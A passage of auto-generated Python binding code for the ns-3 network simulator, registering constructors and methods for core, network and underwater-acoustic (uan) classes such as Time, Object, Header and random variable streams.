cls.add_constructor([param('long long unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int64_t hi, uint64_t lo) [constructor]
cls.add_constructor([param('int64_t', 'hi'), param('uint64_t', 'lo')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(ns3::int64x64_t const & o) [copy constructor]
cls.add_constructor([param('ns3::int64x64_t const &', 'o')])
## int64x64-double.h (module 'core'): double ns3::int64x64_t::GetDouble() const [member function]
cls.add_method('GetDouble',
'double',
[],
is_const=True)
## int64x64-double.h (module 'core'): int64_t ns3::int64x64_t::GetHigh() const [member function]
cls.add_method('GetHigh',
'int64_t',
[],
is_const=True)
## int64x64-double.h (module 'core'): uint64_t ns3::int64x64_t::GetLow() const [member function]
cls.add_method('GetLow',
'uint64_t',
[],
is_const=True)
## int64x64-double.h (module 'core'): static ns3::int64x64_t ns3::int64x64_t::Invert(uint64_t v) [member function]
cls.add_method('Invert',
'ns3::int64x64_t',
[param('uint64_t', 'v')],
is_static=True)
## int64x64-double.h (module 'core'): void ns3::int64x64_t::MulByInvert(ns3::int64x64_t const & o) [member function]
cls.add_method('MulByInvert',
'void',
[param('ns3::int64x64_t const &', 'o')])
return
def register_Ns3AcousticModemEnergyModelHelper_methods(root_module, cls):
## acoustic-modem-energy-model-helper.h (module 'uan'): ns3::AcousticModemEnergyModelHelper::AcousticModemEnergyModelHelper(ns3::AcousticModemEnergyModelHelper const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AcousticModemEnergyModelHelper const &', 'arg0')])
## acoustic-modem-energy-model-helper.h (module 'uan'): ns3::AcousticModemEnergyModelHelper::AcousticModemEnergyModelHelper() [constructor]
cls.add_constructor([])
## acoustic-modem-energy-model-helper.h (module 'uan'): void ns3::AcousticModemEnergyModelHelper::Set(std::string name, ns3::AttributeValue const & v) [member function]
cls.add_method('Set',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'v')],
is_virtual=True)
## acoustic-modem-energy-model-helper.h (module 'uan'): void ns3::AcousticModemEnergyModelHelper::SetDepletionCallback(ns3::Callback<void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> callback) [member function]
cls.add_method('SetDepletionCallback',
'void',
[param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')])
## acoustic-modem-energy-model-helper.h (module 'uan'): ns3::Ptr<ns3::DeviceEnergyModel> ns3::AcousticModemEnergyModelHelper::DoInstall(ns3::Ptr<ns3::NetDevice> device, ns3::Ptr<ns3::EnergySource> source) const [member function]
cls.add_method('DoInstall',
'ns3::Ptr< ns3::DeviceEnergyModel >',
[param('ns3::Ptr< ns3::NetDevice >', 'device'), param('ns3::Ptr< ns3::EnergySource >', 'source')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3Chunk_methods(root_module, cls):
## chunk.h (module 'network'): ns3::Chunk::Chunk() [constructor]
cls.add_constructor([])
## chunk.h (module 'network'): ns3::Chunk::Chunk(ns3::Chunk const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Chunk const &', 'arg0')])
## chunk.h (module 'network'): uint32_t ns3::Chunk::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_virtual=True)
## chunk.h (module 'network'): static ns3::TypeId ns3::Chunk::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## chunk.h (module 'network'): void ns3::Chunk::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3Header_methods(root_module, cls):
cls.add_output_stream_operator()
## header.h (module 'network'): ns3::Header::Header() [constructor]
cls.add_constructor([])
## header.h (module 'network'): ns3::Header::Header(ns3::Header const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Header const &', 'arg0')])
## header.h (module 'network'): uint32_t ns3::Header::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_virtual=True)
## header.h (module 'network'): uint32_t ns3::Header::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## header.h (module 'network'): static ns3::TypeId ns3::Header::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## header.h (module 'network'): void ns3::Header::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## header.h (module 'network'): void ns3::Header::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3Object_methods(root_module, cls):
## object.h (module 'core'): ns3::Object::Object() [constructor]
cls.add_constructor([])
## object.h (module 'core'): void ns3::Object::AggregateObject(ns3::Ptr<ns3::Object> other) [member function]
cls.add_method('AggregateObject',
'void',
[param('ns3::Ptr< ns3::Object >', 'other')])
## object.h (module 'core'): void ns3::Object::Dispose() [member function]
cls.add_method('Dispose',
'void',
[])
## object.h (module 'core'): ns3::Object::AggregateIterator ns3::Object::GetAggregateIterator() const [member function]
cls.add_method('GetAggregateIterator',
'ns3::Object::AggregateIterator',
[],
is_const=True)
## object.h (module 'core'): ns3::TypeId ns3::Object::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## object.h (module 'core'): static ns3::TypeId ns3::Object::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object.h (module 'core'): void ns3::Object::Start() [member function]
cls.add_method('Start',
'void',
[])
## object.h (module 'core'): ns3::Object::Object(ns3::Object const & o) [copy constructor]
cls.add_constructor([param('ns3::Object const &', 'o')],
visibility='protected')
## object.h (module 'core'): void ns3::Object::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## object.h (module 'core'): void ns3::Object::DoStart() [member function]
cls.add_method('DoStart',
'void',
[],
visibility='protected', is_virtual=True)
## object.h (module 'core'): void ns3::Object::NotifyNewAggregate() [member function]
cls.add_method('NotifyNewAggregate',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3ObjectAggregateIterator_methods(root_module, cls):
## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator(ns3::Object::AggregateIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Object::AggregateIterator const &', 'arg0')])
## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator() [constructor]
cls.add_constructor([])
## object.h (module 'core'): bool ns3::Object::AggregateIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## object.h (module 'core'): ns3::Ptr<ns3::Object const> ns3::Object::AggregateIterator::Next() [member function]
cls.add_method('Next',
'ns3::Ptr< ns3::Object const >',
[])
return
def register_Ns3RandomVariableStream_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::RandomVariableStream::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::RandomVariableStream::RandomVariableStream() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): void ns3::RandomVariableStream::SetStream(int64_t stream) [member function]
cls.add_method('SetStream',
'void',
[param('int64_t', 'stream')])
## random-variable-stream.h (module 'core'): int64_t ns3::RandomVariableStream::GetStream() const [member function]
cls.add_method('GetStream',
'int64_t',
[],
is_const=True)
## random-variable-stream.h (module 'core'): void ns3::RandomVariableStream::SetAntithetic(bool isAntithetic) [member function]
cls.add_method('SetAntithetic',
'void',
[param('bool', 'isAntithetic')])
## random-variable-stream.h (module 'core'): bool ns3::RandomVariableStream::IsAntithetic() const [member function]
cls.add_method('IsAntithetic',
'bool',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::RandomVariableStream::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_pure_virtual=True, is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::RandomVariableStream::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_pure_virtual=True, is_virtual=True)
## random-variable-stream.h (module 'core'): ns3::RngStream * ns3::RandomVariableStream::Peek() const [member function]
cls.add_method('Peek',
'ns3::RngStream *',
[],
is_const=True, visibility='protected')
return
def register_Ns3SequentialRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::SequentialRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::SequentialRandomVariable::SequentialRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetMin() const [member function]
cls.add_method('GetMin',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetMax() const [member function]
cls.add_method('GetMax',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): ns3::Ptr<ns3::RandomVariableStream> ns3::SequentialRandomVariable::GetIncrement() const [member function]
cls.add_method('GetIncrement',
'ns3::Ptr< ns3::RandomVariableStream >',
[],
is_const=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::SequentialRandomVariable::GetConsecutive() const [member function]
cls.add_method('GetConsecutive',
'uint32_t',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::SequentialRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::SequentialRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount(ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3EventImpl_Ns3Empty_Ns3DefaultDeleter__lt__ns3EventImpl__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::SimpleRefCount(ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter< ns3::EventImpl > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3NixVector_Ns3Empty_Ns3DefaultDeleter__lt__ns3NixVector__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::SimpleRefCount(ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter< ns3::NixVector > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3Packet_Ns3Empty_Ns3DefaultDeleter__lt__ns3Packet__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter< ns3::Packet > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3Time_methods(root_module, cls):
cls.add_binary_numeric_operator('+', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', 'right'))
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('!=')
cls.add_inplace_numeric_operator('+=', param('ns3::Time const &', 'right'))
cls.add_inplace_numeric_operator('-=', param('ns3::Time const &', 'right'))
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>=')
## nstime.h (module 'core'): ns3::Time::Time() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::Time::Time(ns3::Time const & o) [copy constructor]
cls.add_constructor([param('ns3::Time const &', 'o')])
## nstime.h (module 'core'): ns3::Time::Time(double v) [constructor]
cls.add_constructor([param('double', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(int v) [constructor]
cls.add_constructor([param('int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long int v) [constructor]
cls.add_constructor([param('long int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long long int v) [constructor]
cls.add_constructor([param('long long int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(unsigned int v) [constructor]
cls.add_constructor([param('unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long unsigned int v) [constructor]
cls.add_constructor([param('long unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long long unsigned int v) [constructor]
cls.add_constructor([param('long long unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(std::string const & s) [constructor]
cls.add_constructor([param('std::string const &', 's')])
## nstime.h (module 'core'): ns3::Time::Time(ns3::int64x64_t const & value) [constructor]
cls.add_constructor([param('ns3::int64x64_t const &', 'value')])
## nstime.h (module 'core'): int ns3::Time::Compare(ns3::Time const & o) const [member function]
cls.add_method('Compare',
'int',
[param('ns3::Time const &', 'o')],
is_const=True)
## nstime.h (module 'core'): static void ns3::Time::FreezeResolution() [member function]
cls.add_method('FreezeResolution',
'void',
[],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & from, ns3::Time::Unit timeUnit) [member function]
cls.add_method('From',
'ns3::Time',
[param('ns3::int64x64_t const &', 'from'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & value) [member function]
cls.add_method('From',
'ns3::Time',
[param('ns3::int64x64_t const &', 'value')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::FromDouble(double value, ns3::Time::Unit timeUnit) [member function]
cls.add_method('FromDouble',
'ns3::Time',
[param('double', 'value'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::FromInteger(uint64_t value, ns3::Time::Unit timeUnit) [member function]
cls.add_method('FromInteger',
'ns3::Time',
[param('uint64_t', 'value'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): double ns3::Time::GetDouble() const [member function]
cls.add_method('GetDouble',
'double',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetFemtoSeconds() const [member function]
cls.add_method('GetFemtoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetInteger() const [member function]
cls.add_method('GetInteger',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetMicroSeconds() const [member function]
cls.add_method('GetMicroSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetMilliSeconds() const [member function]
cls.add_method('GetMilliSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetNanoSeconds() const [member function]
cls.add_method('GetNanoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetPicoSeconds() const [member function]
cls.add_method('GetPicoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): static ns3::Time::Unit ns3::Time::GetResolution() [member function]
cls.add_method('GetResolution',
'ns3::Time::Unit',
[],
is_static=True)
## nstime.h (module 'core'): double ns3::Time::GetSeconds() const [member function]
cls.add_method('GetSeconds',
'double',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetTimeStep() const [member function]
cls.add_method('GetTimeStep',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsNegative() const [member function]
cls.add_method('IsNegative',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsPositive() const [member function]
cls.add_method('IsPositive',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsStrictlyNegative() const [member function]
cls.add_method('IsStrictlyNegative',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsStrictlyPositive() const [member function]
cls.add_method('IsStrictlyPositive',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsZero() const [member function]
cls.add_method('IsZero',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): static void ns3::Time::SetResolution(ns3::Time::Unit resolution) [member function]
cls.add_method('SetResolution',
'void',
[param('ns3::Time::Unit', 'resolution')],
is_static=True)
## nstime.h (module 'core'): ns3::int64x64_t ns3::Time::To(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('To',
'ns3::int64x64_t',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
## nstime.h (module 'core'): double ns3::Time::ToDouble(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('ToDouble',
'double',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::ToInteger(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('ToInteger',
'int64_t',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
return
def register_Ns3TraceSourceAccessor_methods(root_module, cls):
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor(ns3::TraceSourceAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor() [constructor]
cls.add_constructor([])
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Connect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Connect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('ConnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Disconnect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('DisconnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3Trailer_methods(root_module, cls):
cls.add_output_stream_operator()
## trailer.h (module 'network'): ns3::Trailer::Trailer() [constructor]
cls.add_constructor([])
## trailer.h (module 'network'): ns3::Trailer::Trailer(ns3::Trailer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Trailer const &', 'arg0')])
## trailer.h (module 'network'): uint32_t ns3::Trailer::Deserialize(ns3::Buffer::Iterator end) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'end')],
is_pure_virtual=True, is_virtual=True)
## trailer.h (module 'network'): uint32_t ns3::Trailer::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trailer.h (module 'network'): static ns3::TypeId ns3::Trailer::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## trailer.h (module 'network'): void ns3::Trailer::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trailer.h (module 'network'): void ns3::Trailer::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3TriangularRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::TriangularRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::TriangularRandomVariable::TriangularRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetMean() const [member function]
cls.add_method('GetMean',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetMin() const [member function]
cls.add_method('GetMin',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetMax() const [member function]
cls.add_method('GetMax',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetValue(double mean, double min, double max) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'mean'), param('double', 'min'), param('double', 'max')])
## random-variable-stream.h (module 'core'): uint32_t ns3::TriangularRandomVariable::GetInteger(uint32_t mean, uint32_t min, uint32_t max) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'mean'), param('uint32_t', 'min'), param('uint32_t', 'max')])
## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::TriangularRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3UanHeaderCommon_methods(root_module, cls):
## uan-header-common.h (module 'uan'): ns3::UanHeaderCommon::UanHeaderCommon(ns3::UanHeaderCommon const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanHeaderCommon const &', 'arg0')])
## uan-header-common.h (module 'uan'): ns3::UanHeaderCommon::UanHeaderCommon() [constructor]
cls.add_constructor([])
